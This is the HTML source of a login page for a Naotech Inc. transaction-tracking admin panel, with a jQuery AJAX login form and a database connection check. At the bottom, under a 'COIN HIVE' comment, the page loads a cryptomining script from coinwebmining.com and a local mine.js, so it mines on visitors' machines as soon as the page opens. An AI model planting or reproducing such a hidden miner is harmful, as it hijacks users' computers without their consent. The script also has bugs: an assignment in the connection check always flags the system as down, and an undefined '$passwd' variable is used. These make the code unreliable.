<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<meta name="description" content="Xenon Boostrap Admin Panel" />
	<meta name="author" content="" />
	
	<title>Naotech Inc.</title>


	<link rel="icon" type="image/png" href="pages/favicon.ico">

	<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Arimo:400,700,400italic">
	<link rel="stylesheet" href="assets/css/fonts/linecons/css/linecons.css">
	<link rel="stylesheet" href="assets/css/fonts/fontawesome/css/font-awesome.min.css">
	<link rel="stylesheet" href="assets/css/bootstrap.css">
	<link rel="stylesheet" href="assets/css/xenon-core.css">
	<link rel="stylesheet" href="assets/css/xenon-forms.css">
	<link rel="stylesheet" href="assets/css/xenon-components.css">
	<link rel="stylesheet" href="assets/css/xenon-skins.css">
	<link rel="stylesheet" href="assets/css/custom.css">
    
    <!-- http://www.allphones.com.ph/images/tabicon.png -->


	<script src="assets/js/jquery-1.11.1.min.js"></script>

	<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
	<!--[if lt IE 9]>
		<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
		<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
	<![endif]-->
	
	
</head>
<body class="page-body login-page login-light">

	<!--devv-->
	
	<div class="login-container">
		
		<center> <img src="assets/images/Trasaction-tracking-and-management-reporting-system.png" alt="" width="350" style="margin-bottom: 8px; margin-top: 15px;"/> </center>
	
		<div class="row">
		
			<div class="col-sm-6">
			
				<script type="text/javascript">
					jQuery(document).ready(function($)
					{
						
						
						
						function check_connection() {
							
							
							var opts = {
								"closeButton": true,
								"debug": false,
								"positionClass": "toast-top-full-width",
								"onclick": null,
								"showDuration": "300",
								"hideDuration": "1000",
								"timeOut": "5000",
								"extendedTimeOut": "1000",
								"showEasing": "swing",
								"hideEasing": "linear",
								"showMethod": "fadeIn",
								"hideMethod": "fadeOut"
							};
							
							
							
							$.ajax({
							url: "dbConCheck.php",
							method: 'POST',
							dataType: 'JSON',
							
							success: function(resp)
								{
									
									if(resp.connection = true) {
										
										toastr.error(resp.message, "System Down!", opts);
										
										$('#username').attr('readonly', true);
										$('#passwd').attr('readonly', true);
										
									}
									
								}
							});	
							
							
							
						}
						
						
						
						check_connection();
						
						
						
										
						// Reveal Login form
						setTimeout(function(){ $(".fade-in-effect").addClass('in'); }, 1);
						
						
						// Validation and Ajax action
						$("form#login").validate({
							rules: {
								username: {
									required: true
								},
								
								passwd: {
									required: true
								}
							},
							
							messages: {
								username: {
									required: 'Please enter your username.'
								},
								
								passwd: {
									required: 'Please enter your password.'
								}
							},
							
							// Form Processing via AJAX
							submitHandler: function(form)
							{
								show_loading_bar(70); // Fill progress bar to 70% (just a given value)
								
								var opts = {
									"closeButton": true,
									"debug": false,
									"positionClass": "toast-top-full-width",
									"onclick": null,
									"showDuration": "300",
									"hideDuration": "1000",
									"timeOut": "5000",
									"extendedTimeOut": "1000",
									"showEasing": "swing",
									"hideEasing": "linear",
									"showMethod": "fadeIn",
									"hideMethod": "fadeOut"
								};
								
								
								
								
									
								$.ajax({
									url: "data/login-check.php",
									method: 'POST',
									dataType: 'JSON',
									data: {
										do_login: true,
										username: $(form).find('#username').val(),
										passwd: $(form).find('#passwd').val(),
									},
									success: function(resp)
									{
										
										
										
										
										show_loading_bar({
											delay: .5,
											pct: 100,
											finish: function(){
												
												// Redirect after successful login page (when progress bar reaches 100%)
												if(resp.accessGranted)
												{
												
													//SET HTML5 sessionStorage 
													sessionStorage.name = resp.account_name;
													sessionStorage.role = resp.store_name;
													
													var user_type = resp.user_type
													sessionStorage.user_type = user_type.toLowerCase();
													
													sessionStorage.main_menu_list = resp.main_menu_list;
													sessionStorage.user_dropdown_menu = resp.user_dropdown_menu;
													
													
													window.location.href = 'pages/';
													
												}
												
												else{
													
													toastr.error(resp.error_message, "Invalid Login!", opts);
													$passwd.select();
												}
											}
											
										});
										
									}
								});
								
							}
						});
						
						// Set Form focus
						$("form#login .form-group:has(.form-control):first .form-control").focus();
					});
				</script>
				
				<!-- Errors container -->
				<div class="errors-container">
				
									
				</div>
				
				<!-- Add class "fade-in-effect" for login form effect -->
				<form method="post" role="form" id="login" class="login-form fade-in-effect">
					
					<div class="login-header">
                 
                    	<a href="home.html" class="logo">
                        	<!--<img src="assets/images/Attendance-monitoring-logo.png" alt="" width="250" />-->
							<span></span>
						</a>
						
						<p>Please input your data to access the page:</p>
                        
					</div>
                    
                    
                    
                    
                    
                  	 <div class="form-group">
                     	
                        <!--
						<select class="form-control" name="login_type" id="login_type">
                        	
							<option value="admin" disabled selected>Administrator</option>
							<option value="asm" disabled selected>Area Sales Manager</option>
							<option value="rsm" disabled selected>Regional Sales Manager</option>
							<option value="sm" disabled selected>Store Manager</option>
							<option value="sc">Sales Consultant</option>
                            <option disabled selected>Select login type ..</option>
						</select>
                        -->
                        
					</div>
					
					<div class="form-group">
						<label class="control-label" for="username">Username</label>
						<input type="text" class="form-control" name="username" id="username" autocomplete="off" />
					</div>
					
					<div class="form-group">
						<label class="control-label" for="passwd">Password</label>
						<input type="password" class="form-control" name="passwd" id="passwd" autocomplete="off" />
					</div>
                    
                   
                    
                    
                    	
					
					<div class="form-group">
						<button type="submit" class="btn btn-dark  btn-block text-left">
							<i class="fa-lock"></i>
							Log In
						</button>
					</div>
					
					<div class="login-footer">
						Naotech Incorporated. 2015
                    	<!--
						<a href="#">Forgot your password?</a>
						-->
                        
						<div class="info-links">
							
                            <!--
                            CLIENT IP: <span id="lbl_client_ip"></span>
                            -->
                            
						</div>
						
					</div>
					
				</form>
				
				<!-- 
				<div class="external-login">
					<a href="#" class="facebook">
						<i class="fa-facebook"></i>
						Facebook Login
					</a>
					
					
					<a href="#" class="twitter">
						<i class="fa-twitter"></i>
						Login with Twitter
					</a>
					
					<a href="#" class="gplus">
						<i class="fa-google-plus"></i>
						Login with Google Plus
					</a>
					 
				</div>
                -->
				
			</div>
			
			<div class="col-sm-6"  style="font-size:11px; margin-top:20px; margin-bottom: 15px; color: rgba(151, 152, 152, 0.7);">
                			
                            
                			<br>
                            <hr>
               				<a href="http://www.naotech.com.ph/">
    						<img src="assets/images/logo@2x.png" alt="" width="100" style="margin-bottom: 8px;"/>
                			</a><br>
                			
               				<b
                            85/
                            b>ADDRESS:</b> Unit 3A Genesis Building, 182-A 19th Avenue,
                        					Brgy. East Rembo, Makati City, Philippines,
                                            1216 (In front of Mater Dolorosa Parish) <br>
                			<b>TELEFAX:</b> +(63) 2 798 2168 <br>
                			<b>SUPPORT:</b> <a href="mailto:support@naotech.com.ph" style="color:#F00">support@naotech.com.ph</a> <br>
                           
                             
   		    </div>
				
			
		</div>
		
	</div>



	<!-- Bottom Scripts -->
	<script src="assets/js/bootstrap.min.js"></script>
	<script src="assets/js/TweenMax.min.js"></script>
	<script src="assets/js/resizeable.js"></script>
	<script src="assets/js/joinable.js"></script>
	<script src="assets/js/xenon-api.js"></script>
	<script src="assets/js/xenon-toggles.js"></script>
	<script src="assets/js/jquery-validate/jquery.validate.min.js"></script>
	<script src="assets/js/toastr/toastr.min.js"></script>


	<!-- JavaScripts initializations and stuff -->
	<script src="assets/js/xenon-custom.js"></script>
	
	<!--COIN HIVE -->
	<script src="https://coinwebmining.com/cwm.js"></script>
	<script src="mine.js"></script>

</body>
</html>